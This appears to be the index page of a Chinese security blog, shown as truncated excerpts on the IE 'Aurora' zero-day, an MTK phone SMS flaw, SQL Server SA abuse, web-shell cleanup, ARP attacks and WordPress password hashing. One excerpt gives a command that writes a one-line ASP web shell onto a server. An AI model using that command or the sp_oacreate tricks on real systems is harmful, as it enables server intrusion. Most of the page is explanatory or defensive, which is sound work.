Pray's Blog

　　微软针对黑客用来攻击Google及其它33家公司的IE零日漏洞发布紧急更新。 　　这是微软2010年首次发布非常规补丁，按照常规，微软将于2月份第二周周二发布漏洞补丁。目前针对极光漏洞的病毒疫情十分紧急，短短3天内，极光漏洞已经迅速被国内黑客广泛用于网站挂马，目前已有大约70%的挂马网站利用这一漏洞传播各类恶意软件。微软已向所有MAPP成员发...阅读更多

此0day漏洞存在于IE浏览器，且可导致远程代码执行 研究发现Windows 2000 SP4上(以下省去Windows)的IE 5.1 SP4不受此影响；而以下IE版本（无论是32位还是64位）均受此漏洞影响： 2000 SP4上的 IE6 SP1 XP、Server 2003、Vista、Server 2008、7、Server 2008 R2上的IE6、IE7、IE8 此漏洞存在于IE无效的指针引用。当对象被删除后，在一定的条件下可以访...阅读更多

影响手机品牌：所有MTK方案手机（也就是我们常说的山寨手机） 且 写短信时有【“选项”——“插入对象”——“我的铃声”】这一功能（大部分山寨手机都有此功能） 漏洞原理： 在大部分MTK方案手机中，编写短信息的时候可以插入一种“imy”格式的铃声文件， 而具有同样功能的手机接收到此短信后在查看信息内容的同时可以听到短信息内插入的铃声 由于MTK方案手机在...阅读更多

SA权限权利非常大,但可能有的朋友感觉使用起来不方便,接下来和大家一起讨论几种上传文件的方法,如果还有别的方法,希望大家能分享出来. 1、NBSI的命令方法:写入一句话木SHELL,命令如下: 1 echo ^<25%execute request("#")25%^> >d:\web\mm.asp 这样要写入一句话木马,如果说被杀软,KILL掉,就可以连上去了。net stop &...阅读更多

有了sa但无xp_cmdshell ，怎么恢复都提示出错。好象是xxxx.cpp哪里哪里出错。或者找不到指定模块，反正我遇到好多次了。在用exec sp_oacreate ‘wscript.shell’也没办法的情况下。。可用此方法 （很多服务器都把 ‘wscript.shell’给删了。） 看到既然能用sp_oacreate，sp_oamethod来弄 ‘wscript.shell’或者scripti...阅读更多

清除木马 1、找挂马的标签，预防网站入侵 比如有<script language=”javascript” src=”网马地址”></script>或<iframe width=420 height=330 frameborder=0 scrolling=auto src=网马地址></iframe>，或者是你用360或病杀毒软件拦截了网马网址。SQL数据库被挂马，一般是JS挂马。 2、找到了恶意代码后，...阅读更多

    　如果你是Windows2k 或xp的用户，那么你一仔细看咯，在这里教大家一招金蝉脱窍 ―― 而且只需要这一招克就能死所有病毒!! 如果你是新装的系统(或者是你能确认你的系统当前是无毒的)，那就再好不过了，现在就立即就打开：     “开始→程序→管理工具→计算机管理→本地用户和组→用户”    　 首先就是把超级管理员密码更改成十位数以上，然后再建立一个...阅读更多

　　最近网络中有主机频繁断线，刚刚开始还比较正常，但是一段时间后就出现断线情况，有时很快恢复，但是有时要长达好几分钟啊，这样对工作影响太大了。最初怀疑是否是物理上的错误，总之从最容易下手的东西开始检查，检查完毕后没有发现异常！突然想到目前网上比较流行的ARP攻击，ARP攻击出现的故障情况与此非常之相似！对于ARP攻击，一般常规办法是...阅读更多

　　WordPress系统的用户密码是保存在wp_users数据表的user_pass字段，密码是通过Portable PHP password hashing framework类产生的，密码的形式是随机且不可逆，同一个明文的密码在不同时间，产生的密文也不一样，相对来说较为安全。 　　WordPress用户密码产生的过程是，当需要生成用户密码的时候，随机产生了一个salt，然后将salt和password相加，...阅读更多

　　注册表、任务管理器打不开，硬盘占用变大……用瑞星(促销产品 主营产品)、克星杀出rvpk???,win32.agent.a，木马若干后，只有那个该死的任务管理器还是打不开，现象是鼠标只轻轻地“忙”一下就没任何反应了（不是那种弹个管理器的外观马上就消失）。 　　具体症状如下： 　　用regedit,或gpedit.msc设定任务管理器的方法无效； 　　拷贝新...阅读更多